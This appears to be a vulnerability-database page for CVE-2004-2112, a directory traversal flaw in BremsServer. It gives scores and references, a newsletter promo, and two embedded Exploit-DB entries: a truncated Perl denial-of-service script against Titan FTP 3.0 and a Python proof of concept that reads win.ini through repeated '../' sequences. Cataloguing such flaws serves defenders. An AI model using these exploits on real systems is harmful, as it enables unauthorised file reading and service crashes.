CVE-2004-2112
published 2004-12-31CVE-2004-2112: Directory traversal vulnerability in BremsServer 1.2.4 allows remote attackers to read arbitrary files via ".." (dot dot) sequences in the URL.
PriorityP429medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.59%
88.0th percentile
Directory traversal vulnerability in BremsServer 1.2.4 allows remote attackers to read arbitrary files via ".." (dot dot) sequences in the URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| herberlin | bremsserver | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Titan FTP Server 3.0 - 'LIST' Denial of Service
exploitdb·2004-05-04
CVE-2004-0437 Titan FTP Server 3.0 - 'LIST' Denial of Service
Titan FTP Server 3.0 - 'LIST' Denial of Service
---
source: https://www.securityfocus.com/bid/10272/info
Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.
A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
use IO::Socket;
$host = "192.168.1.243";
my @combination;
$combination[0] = "LIST \r\n";
for (my $i = 0; $combination[$i] ; $i++)
{
print "Combination: $1\n";
$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "2112",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while ()
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER
Exploit-DB
herberlin bremsserver 1.2.4/3.0 - Directory Traversal
exploitdb·2004-01-26
CVE-2004-2112 herberlin bremsserver 1.2.4/3.0 - Directory Traversal
herberlin bremsserver 1.2.4/3.0 - Directory Traversal
---
source: https://www.securityfocus.com/bid/9493/info
Herberlin BremsServer is prone to a directory-traversal vulnerability. An attacker may exploit this issue to gain access to files residing outside the web server root directory of the affected system. This issue exists due to a failure to validate user specified URI input.
BremsServer 3.0 is vulnerable; other versions may also be affected.
# --PoC--
import socket
host = 'localhost'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('GET /' + '../' * 16 + 'windows/win.ini HTTP/1.1\r\n'
'Host: localhost\r\n\r\n')
print s.recv(8192)
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107513747107031&w=2http://secunia.com/advisories/10731http://www.osvdb.org/3755http://www.securityfocus.com/bid/9493http://www.securitytracker.com/id?1008853https://exchange.xforce.ibmcloud.com/vulnerabilities/14954http://marc.info/?l=bugtraq&m=107513747107031&w=2http://secunia.com/advisories/10731http://www.osvdb.org/3755http://www.securityfocus.com/bid/9493http://www.securitytracker.com/id?1008853https://exchange.xforce.ibmcloud.com/vulnerabilities/14954
2004-12-31
Published